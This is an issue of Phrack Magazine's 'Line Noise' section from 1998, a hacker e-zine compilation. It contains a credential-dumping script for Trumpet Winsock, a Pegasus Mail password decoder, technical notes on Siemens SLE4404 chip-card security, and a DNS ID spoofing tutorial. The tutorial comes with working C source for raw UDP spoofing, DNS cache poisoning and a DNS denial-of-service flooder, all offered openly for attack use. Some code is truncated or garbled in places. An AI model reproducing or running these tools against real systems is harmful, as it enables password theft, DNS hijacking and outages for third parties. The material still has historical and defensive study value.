---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20 -------------------------[ P H R A C K 5 2 L I N E N O I S E --------[ Various 0x1>------------------------------------------------------------------------- Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you. <++> password.cmd # Put in Trumpet Winsock directory, run under "Dialer/Other" # Cannot currently use any file other than trumpwsk.ini, # apparently due to implementation errors in the "load" function display \n display "Trumpet Password Thief 1.0, 8-18-95"\n display \n if [load $username] display "username: " display $username\n else display "ERR: cannot load username"\n end if [load $password] display "password: " display $password\n else display "ERR: cannot load password"\n end display \n <--> - anonymous 0x2>------------------------------------------------------------------------- Another password decoder for ya... written long ago, I just never bothered to release it... <++> peg-dec.c /* * Pegasus Mail Password Decoder v1.0 by Belgorath */ #include /* Decoding/Encoding Tables */ int dec1[1]= { 44 }; int dec2[2]= { 16, 21 }; int dec3[3]= { 10, 22, 28 }; int dec4[4]= { 37, 28, 21, 7 }; int dec5[5]= { 21, 22, 37, 28, 9 }; int dec6[6]= { 22, 15, 28, 42, 17, 2 }; int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 }; int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 }; int decode_char(int numch, int ch, int pos) { ch-=decz[numch-1][pos-1]; if(ch<-127) ch+=256; return ch; } void main(void) { int zz,x,nc; char *tz; int inps[20]; nc=0; tz=malloc(8192); printf("Enter Pegasus Mail Password: "); gets(tz); /* Fun input parsing loop. Hope your malloc bzero's... */ while( *tz ) { for(x=0;x 0x3>------------------------------------------------------------------------- :----------------------------: Siemens Chip Card Technology . by Yggdrasil . :----------------------------: Chip cards differ from one another in memory size, type of memory (PROM or EEPROM), security logic and micro-controller. This article will discuss the Siemens SLE4404 chip card technology. The SLE4404 is employed for electronic purse cards and bank transactions, cellular telephony (pre-payed cards), user IDs for access control, etc. (some examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed through a simple TTL serial channel, providing a +5 Vcc power supply from an external source. Inside the chip ~~~~~~~~~~~~~~~ The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix (each row is 16-bits) that is protected by security logic providing access control. This is the logic diagram: +------------------------+ +------------------+ | Address Counter | --> | Column Decoder | +------------------------+ +------------------+ ^ | | 16 | v v +-----------+ +---------+ +------------------+ C3,C8,C2,C5 --> | Control & | | Row | | User mem 208 bit | C1 (Vcc) --> | Security | | Decoder | --> | Sec unit 192 bit | C7 (I/O) <--> | Logic | | | 26 | Special mem unit | +-----------+ +---------+ +------------------+ ^ ^ | | +----------------------------------+ The SLE4404 memory is subdivided in three main memory blocks: one is read only (a "PROM" containing the manufacturer code and/or a serial number and an expiration date), the second is both readable and writeable (user memory) and the last block cannot be written to unless the lock-out fuse has been fused. This is the memory map: BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE ----------------------------------------------------------------------------- Manufacturer code 16 0-15 Yes No No Application ROM 48 16-63 Yes No No User code 16 64-79 [fuse] U.C. U.C. Error counter 4 80-83 Yes Yes U.C. EEPROM #1 12 84-95 Yes Yes U.C. EEPROM #2 16 96-111 Yes U.C. U.C. Frame memory block - F.M. config 2 112-113 Yes Yes U.C./R.C. - Frame memory 206 114-319 [cfg] [cfg] U.C./R.C. Frame code 32 320-351 [fuse] [fuse] [cfg] Frame counter 64 352-415 Yes Yes [cfg] ----------------------------------------------------------------------------- Meaning of abbreviations: U.C. - User code required (each time the code is entered the error counter is decreased) R.C. - Frame code required (each time the code is entered the frame counter is decreased) [fuse] - Operation allowed ONLY IF lock-out fuse is not fused [cfg] - Operation allowed according to frame memory configuration Frame memory configuration table: BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE ----------------------------------------------------------------------------- 0 0 Secret ROM Yes No 0 1 R.O.M. Yes No 1 0 Secret PROM U.C. U.C. 1 1 P.R.O.M. U.C. U.C. ----------------------------------------------------------------------------- The first 16-bit block is for the Manufacturer Code. The following 48-bit block is called Application ROM, containing another code (Manufacturer sub code or info, serial number, sub-type of card, etc). The User Code is the access code (PIN) used to read/write/erase memory. This code can be modified provided that the fuse was not fused, while the error counter value can be modified even if the fuse was fused... Please note that access to memory is blocked after four incorrect access trials (checked by the counter). The same is for the Frame Code and the Frame [error] Counter (note that the number of incorrect accesses is limited to three trials instead of four). Finally, the Frame Memory is generally used for storing personal user information or the credit limit (money that can be fetched in a bank transaction, or the remaining "virtual" credit that a pre-payed cellular card contains). The Pin-out ~~~~~~~~~~~ This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): +-------+-------------------+ | C 1 | C 5 | Contact Pin Info | | | +-------+ +-------+ 1 6 Vcc +5V | C 2 | | C 6 | 2 5 Reset | | | | 3 4 Clock +-------+ +-------+ 4 3 Test input - N.C. | C 3 | | C 7 | 5 8 Ground | | | | 6 7 N.C. +-------+ +-------+ 7 1 Bi-directional I/O data line | C 4 | | C 8 | 8 2 Control input (data change) | | | | +-------+-----------+-------+ "I am for ever walking upon these shores, betwixt the sand and the foam. The high tide will erase my foot-prints, and the wind will blow away the foam. But the sea and the shore will remain For ever." -- Gibran K. Gibran 0x4>------------------------------------------------------------------------- ___ ______ _ _ / \ | _ \ | \ / | | / \ | | | \ | | \_/ | | |___| | | |_ / | | \_/ | ..oO THE | --- | | / | | | | CreW Oo.. ''' ''' ''''''' '''' '''' presents DNS ID Hacking --[1]-- DNS ID Hacking Presentation You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID hack/spoof is very efficient and very strong as there is no generation of DNS daemons that escapes from it (even WinNT!). --[1.1]-- DNS Protocol mechanism explanation In the first step, you must know how the DNS works. I will only explain the most important facts of this protocol. In order to do that, we will follow the way of a DNS request packet from A to Z! Name resolution example: The client (bla.bibi.com) sends a request of resolution of the domain "www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for DNS. Let's take a look at the following picture.. /---------------------------------\ | 111.1.2.123 = bla.bibi.com | | 111.1.2.222 = dns.bibi.com | | format: | | IP_ADDR:PORT->IP_ADDR:PORT | | ex: | | 111.1.2.123:2999->111.1.2.222:53| \---------------------------------/ ... gethosbyname("www.heike.com"); ... [bla.bibi.com] [dns.bibi.com] 111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53 Here we see our resolution name request from source port 1999 which is asking to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has received the resolution request from bla.bibi.com, dns.bibi.com will have to resolve the name: [dns.bibi.com] [ns.internic.net] 111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53 dns.bibi.com asks ns.internic.net who the root name server for the address of www.heike.com is, and if it doesn't have it and sends the request to a name server which has authority on '.com' domains (note: we send a request to the Internic because it could have this request in its cache). [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53 Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS that has authority over the domain bibi.com), that the name server of for.com has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will ask to ns.for.com for the address of www.heike.com, but this one doesn't have it and will forward the request to the DNS of heike.com which has authority for heike.com. [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53 The answer from ns.for.com: [ns.for.com] [ns.bibi.com] 144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53 Now that we know which IP address has authority on the domain "heike.com" (we'll call it ns.heike.com), we ask it what's the IP of the machine www.heike.com. [ns.bibi.com] [ns.heike.com] 111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53 We now have our answer: [ns.heike.com] [ns.bibi.com] 31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 Great we have the answer, we can forward it to our client bla.bibi.com. [ns.bibi.com] [bla.bibi.com] 111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999 Now bla.bibi.com knows the IP of www.heike.com. Now let's imagine that we'd like to have the name of a machine from its IP, in order to do that, we proceed a bit differently as the IP will have to be transformed. Reverse name lookup resolution: 100.20.40.3 will become 3.40.20.100.in-addr.arpa This method is only for the IP resolution request (reverse DNS). Let's look at a practical example of when we take the IP address of www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation into a comprehensible format by DNS). ... gethostbyaddr("31.33.7.44"); ... We send our request to ns.bibi.com: [bla.bibi.com] [ns.bibi.com] 111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53 Which is forwarded to ns.internic.net: [ns.bibi.com] [ns.internic.net] 111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 ns.internic.net will send the IP of a name server which has authority on '31.in-addr.arpa'. [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53 And so on. The mechanism is nearly the same that was used for name resolution. --[1.2]-- DNS packet header Here is the format of a DNS message : +---------------------------+---------------------------+ | ID (the famous :) | flags | +---------------------------+---------------------------+ | numbers of questions | numbers of answer | +---------------------------+---------------------------+ | number of RR authority |number of supplementary RR | +---------------------------+---------------------------+ | | \ \ \ QUESTION \ | | +-------------------------------------------------------+ | | \ \ \ ANSWER \ | | +-------------------------------------------------------+ | | \ \ \ Stuff etc.. No matter \ | | +-------------------------------------------------------+ --[1.3]-- Structure of DNS packets. __ID__ The ID permits us to identify each DNS packet, since exchanges between name servers are from port 53 to port 53, and more it might be more than one request at a time, so the ID is the only way to recognize the different DNS requests. Well talk about it later.. __flags__ The flags area is divided into several parts : 4 bits 3 bits (always 0) | | | | [QR | opcode | AA| TC| RD| RA | zero | rcode ] | | |__|__|__| |______ 4 bits | |_ 1 bit | 1 bit QR = If the QR bit = 0, it means that the packet is a question, otherwise it's an answer. opcode = If the value is 0 for a normal request, 1 for a reserve request, and 2 for a status request (we don't need to know all these modes). AA = If it's equal to 1, it says that the name server has an authoritative answer. TC = No matter RD = If this flag is to 1, it means "Recursion Request", for example when bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the DNS to assume this request. RA = If it's set to 1, it means that recursion is available. This bit is set to 1 in the answer of the name server if it supports recursion. Zero = Here are three zeroes... rcode = It contains the return error messages for DNS requests if 0, it means "no error", 3 means "name error" The 2 following flags don't have any importance for us. DNS QUESTION: Here is the format of a DNS question : +-----------------------------------------------------------------------+ | name of the question | +-----------------------------------------------------------------------+ | type of question | type of query | +--------------------------------+--------------------------------------+ The structure of the question is like this. example: www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] for an IP address, the format remains the same. 44.33.88.123.in-addr.arpa would be: [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] [note]: a compression format exists, but we won't cover it. type of question: Here are the values that we will use much of the time (there are many more, but these are only ones relevant): name value A | 1 | IP Address (resolving a name to an IP) PTR | 12 | Pointer (resolving an IP to a name) type of query: The values are the same as the type of question. DNS ANSWER: Here is the format of an answer (an RR) +------------------------------------------------------------------------+ | name of the domain | +------------------------------------------------------------------------+ | type | class | +----------------------------------+-------------------------------------+ | TTL (time to live) | +------------------------------------------------------------------------+ | resource data length | | |----------------------------+ | | resource data | +------------------------------------------------------------------------- name of the domain: The name of the domain in reports to the following resource: The domain name is stored in the same way that the part question for the resolution request of www.heike.com, the flag "name of the domain" will contain [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. type: The type flag is the same than "type of query" in the question part of the packet. class: The class flag is equal to 1 for Internet data. time to live: This flag explains in seconds the time-life of the information into the name server cache. resource data length: The length of resource data, for example if resource data length is 4, it means that the data in resources data are 4 bytes long. resource data: here we put the IP for example (at least in our case) I will offer you a little example that explains this better: Here is what's happening when ns.bibi.com asks ns.heike.com for www.heike.com's address ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) +---------------------------------+--------------------------------------+ | ID = 1999 | QR = 0 opcode = 0 RD = 1 | +---------------------------------+--------------------------------------+ | numbers of questions = htons(1) | numbers of answers = 0 | +---------------------------------+--------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+--------------------------------------+ +------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +------------------------------------------------------------------------+ | type of question = htons(1) | type of query=htons(1) | +---------------------------------+--------------------------------------+ here is for the question. now let's stare the answer of ns.heike.com ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 +---------------------------------+---------------------------------------+ | ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 | +---------------------------------+---------------------------------------+ | numbers of questions = htons(1) | numbers of answers = htons(1) | +---------------------------------+---------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+---------------------------------------+ +-------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type of question = htons(1) | type of query = htons(1) | +-------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type = htons(1) | class = htons(1) | +-------------------------------------------------------------------------+ | time to live = 999999 | +-------------------------------------------------------------------------+ | resource data length = htons(4) | resource data=inet_addr("31.33.7.44") | +-------------------------------------------------------------------------+ Yah! That's all for now :)) Here is an analysis: In the answer QR = 1 because it's an answer :) AA = 1 because the name server has authority in its domain RA = 1 because recursion is available Good =) I hope you understood that cause you will need it for the following events. --[2.0]-- DNS ID hack/spoof Now it's time to explain clearly what DNS ID hacking/spoofing is. Like I explained before, the only way for the DNS daemon to recognize the different questions/answers is the ID flag in the packet. Look at this example: ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53 So you only have to spoof the ip of ns.heike.com and answer your false information before ns.heike.com to ns.bibi.com! ns.bibi.com <------- . . . . . . . . . . . ns.heike.com | |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com But in practice you have to guess the good ID :) If you are on a LAN, you can sniff to get this ID and answer before the name server (it's easy on a Local Network :) If you want to do this remotely you don't have a lot a choices, you only have 4 basics methods: 1.) Randomly test all the possible values of the ID flag. You must answer before the ns ! (ns.heike.com in this example). This method is obsolete unless you want to know the ID .. or any other favorable condition to its prediction. 2.) Send some DNS requests (200 or 300) in order to increase the chances of falling on the good ID. 3.) Flood the DNS in order to avoid its work. The name server will crash and show the following error! >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT at this time named daemon is out of order :) 4.) Or you can use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.) with ID prediction (we will discuss this in a bit). ##################### Windows ID Vulnerability ########################### I found a heavy vulnerability in Windows 95 (I haven't tested it on WinNT), lets imagine my little friend that's on Windows 95. Windows ID's are extremely easy to predict because it's "1" by default :))) and "2" for the second question (if they are 2 questions at the same time). ######################## BIND Vulnerability ############################## There is a vulnerability in BIND (discovered by SNI as stated earlier). In fact, DNS IS are easily predictable, you only have to sniff a DNS in order to do what you want. Let me explain... The DNS uses a random ID at the beginning but it only increase this ID for next questions ... =))) It's easy to exploit this vulnerability. Here is the way: 1. Be able to sniff easily the messages that comes to a random DNS (ex. ns.dede.com for this sample). 2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will ask to ns.dede.com to resolve (random).dede.com ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com 3. Now you have the ID of the message from NS.victim.com, now you know what ID area you'll have to use. (ID = 444 in this sample). 4. You then make your resolution request. ex. www.microsoft.com to NS.victim.com (you) ---> [?www.microsoft.com] ---> ns.victim.com ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 5. Flood the name server ns.victim.com with the ID (444) you already have and then you increase this one. ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com (now you know that DNS IDs are predictable, and they only increase. You flood ns.victim.com with spoofed answers with the ID 444+ ;) *** ADMsnOOfID does this. There is another way to exploit this vulnerability without a root on any DNS The mechanism is very simple. Here is the explanation We send to ns.victim.com a resolution request for *.provnet.fr (you) ----------[?(random).provnet.fr] -------> ns.victim.com Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. There is nothing new here, but the interesting part begins here. From this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr IP) with ids from 100 to 110... (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com ..... After that, we ask ns.victim.com if (random).provnet.fr has an IP. If ns.victim.com give us an IP for (random).provnet.fr then we have found the correct ID :) Otherwise we have to repeat this attack until we find the ID. It's a bit long but it's effective. And nothing forbids you to do this with friends ;) This is how ADMnOg00d works ;) ------------------------------- ########################################################################## Here you will find 5 programs ADMkillDNS - very simple DNS spoofer ADMsniffID - sniff a LAN and reply false DNS answers before the NS ADMsnOOfID - a DNS ID spoofer (you'll need to be root on a NS) ADMnOg00d - a DNS ID predictor (no need to be root on a NS) ADNdnsfuckr - a very simple denial of service attack to disable DNS Have fun!! :) Note: You can find source and binaries of this progs at ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would be on janova. You need to install libpcap on your machine before any compilation of the ADMID proggies :) ADM Crew. Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love these guys) Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at www.secnet.com for finding the vulnerability =) <++> ADMIDpack/ADM-spoof.c /************************************************************************/ /* ADM spoofing routine for spoof udp */ /************************************************************************/ #define IPHDRSIZE sizeof(struct iphdr) #define UDPHDRSIZE sizeof(struct udphdr) #include #include #include #include #include #include #include #include #include #include #include #include "ip.h" #include "udp.h" /*****************************************************************************/ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ /*****************************************************************************/ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) int s; unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; char * datagram; unsigned datasize; { struct sockaddr_in sin; struct iphdr *ip; struct udphdr *udp; unsigned char *data; unsigned char packet[4024]; int x; ip = (struct iphdr *)packet; udp = (struct udphdr *)(packet+IPHDRSIZE); data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE); memset(packet,0,sizeof(packet)); udp->source = htons(sport); udp->dest = htons(dport); udp->len = htons(UDPHDRSIZE+datasize); udp->check = 0; memcpy(data,datagram,datasize); memset(packet,0,IPHDRSIZE); ip->saddr.s_addr = saddr; ip->daddr.s_addr = daddr; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->id = random()%5985; ip->protocol = IPPROTO_UDP; ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize); ip->check = 0; ip->check = in_cksum((char *)packet,IPHDRSIZE); sin.sin_family=AF_INET; sin.sin_addr.s_addr=daddr; sin.sin_port=udp->dest; x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)); return(x); } /*****************************************************************************/ /* RECV PAKET */ /* get_pkt(socket, *buffer , size of the buffer); */ /*****************************************************************************/ int get_pkt(s,data,size) int s; unsigned char *data; int size; { struct sockaddr_in sin; int len,resu; len= sizeof(sin); resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len); return resu; } <--> <++> ADMIDpack/ADMDNS2.c /*************************************************/ /* DNS include for play with DNS packet (c) ADM */ /*************************************************/ #define ERROR -1 #define DNSHDRSIZE 12 #define TYPE_A 1 #define TYPE_PTR 12 int myrand() { int j; j=1+(int) (150.0*rand()/(RAND_MAX+1.0)); return(j); } unsigned long host2ip(char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent=gethostbyname(serv); if(hent == NULL) return 0; bzero((char *)&sinn, sizeof(sinn)); bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); return sinn.sin_addr.s_addr; } void nameformat(char *name,char *QS) { /* CRAP & LAme COde :) */ char lol[3000]; char tmp[2550]; char tmp2[2550]; int i,a=0; bzero(lol,sizeof(lol)); bzero(tmp,sizeof(tmp)); bzero(tmp2,sizeof(tmp2)); for(i=0;iid = 6000+myrand(); dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,name,type); udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i); close(sraw); } void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type) { struct dnshdr *dns; char buff[1024]; char *data; int i; int on=1; int sraw; if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } dns = (struct dnshdr *) buff; data = (char *)(buff+DNSHDRSIZE); bzero(buff,sizeof(buff)); dns->id = htons(ID); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,name,spoofip,type); printf(" I apres Makepaket == %i \n",i); udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i); close(sraw); } void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type) { struct dnshdr *dns; char buff[1024]; char *data; u_long fakeip; u_long trustip; u_long victimip; int loop,rere; dns = (struct dnshdr *)buff; data = (char *)(buff+DNSHDRSIZE); trustip = host2ip(dnstrust); victimip = host2ip(victim); fakeip = host2ip("12.1.1.0"); /* send question ... */ if( type == TYPE_PTR) for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type); if( type == TYPE_A) for(loop=0;loop<4;loop++) sendquestion(fakeip,victimip,spoofname,type); /* now its time to awnser Quickly !!! */ for(rere = 0; rere < 2;rere++){ for(loop=0;loop < 80;loop++){ printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n", dnstrust,victim,spoofname,spoofip,ID+loop,type); sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type); } } } <--> <++> ADMIDpack/ADMdnsfuckr.c /* ADM DNS DESTROYER */ #define DNSHDRSIZE 12 #define VERSION "0.2 pub" #define ERROR -1 #include #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char namez[255]; unsigned long s_ip; unsigned long d_ip; int sraw,on=1; if(argc <2){printf(" usage : %s \n",argv[0]); exit(0);} dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+12); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION); printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n"); sleep(1); s_ip=host2ip("100.1.2.3"); d_ip=host2ip(argv[1]); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); while(1){ sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand()); printf("%s\n",namez); strcpy(data,namez); *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12); *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1); udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5); s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip); } } <--> <++> ADMIDpack/ADMkillDNS.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define VERSION "0.3 pub" #define ID_START 1 #define ID_STOP 65535 #define PORT_START 53 #define PORT_STOP 54 void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char namez[255]; unsigned long s_ip,s_ip2; unsigned long d_ip,d_ip2; int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop; if(argc <5){ system("/usr/bin/clear"); printf(" usage : %s \n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]); printf(" ip src: ip source of the dns anwser\n"); printf(" ip dst: ip of the dns victim\n"); printf(" name : spoof name ex: www.dede.com\n"); printf(" ip : the ip associate with the name\n"); printf(" options \n"); printf(" [A,B,N] \n"); printf(" A: flood the DNS victim with multiple query\n"); printf(" B: DOS attack for destroy the DNS \n"); printf(" N: None attack \n\n"); printf(" [ID_START] \n"); printf(" ID_START: id start :> \n\n"); printf(" [ID_STOP] n"); printf(" ID_STOP : id stop :> \n\n"); printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n"); printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION); exit(ERROR); } dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMkillDNS %s",VERSION); printf("\nouais ben mwa je dedie ca a ma Heike"); printf("\nREADY FOR ACTION!\n"); s_ip2=s_ip=host2ip(argv[1]); d_ip2=d_ip=host2ip(argv[2]); if(argc>5)if(*argv[5]=='A') { for(loop=0;loop<10;loop++){ dns->id = 6000+loop; dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,argv[3],TYPE_A); udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i); s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip); } } /* end of DNS flood query */ /* ici on trouve la routine contre un DOS */ if(argc>5)if(*argv[5]=='B') { s_ip=host2ip("100.1.2.3"); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); printf("plz enter the number of packet u wanna send\n"); scanf("%i",&i); for(x=0;x 6 )idstart = atoi(argv[6]); else idstart = ID_START; if(argc > 7 )idstop = atoi(argv[7]); else idstop = ID_STOP; if(argc > 8 ){ portstart = atoi(argv[8]); portstop = atoi(argv[9]); } else { portstart = PORT_START; portstop = PORT_STOP; } bzero(buffer2,sizeof(buffer2)); bzero(namez,sizeof(namez)); i=0; x=0; s_ip=s_ip2; d_ip=d_ip2; for(;idstartid = htons(idstart); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop); i=makepaketAW(data,argv[3],argv[4],TYPE_A); for(;x < portstop; x++) udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i); x = portstart; } printf(" terminated..\n"); } <--> <++> ADMIDpack/ADMnOg00d.c /***************************/ /* ADMnog00d (c) ADM */ /***************************/ /* ADM DNS ID PREDICTOR */ /***************************/ #include #include #include "dns.h" #include "ADM-spoof.c" #include "ADMDNS2.c" #define VERSION "0.7 pub" #define SPOOFIP "4.4.4.4" #define ERROR -1 #define LEN sizeof(struct sockaddr) #define UNDASPOOF "111.111.111.111" #define TIMEOUT 300 #define DNSHDRSIZE 12 void usage() { printf(" ADMnoG00D [ID] \n"); printf("\n ex: ADMnoG00d 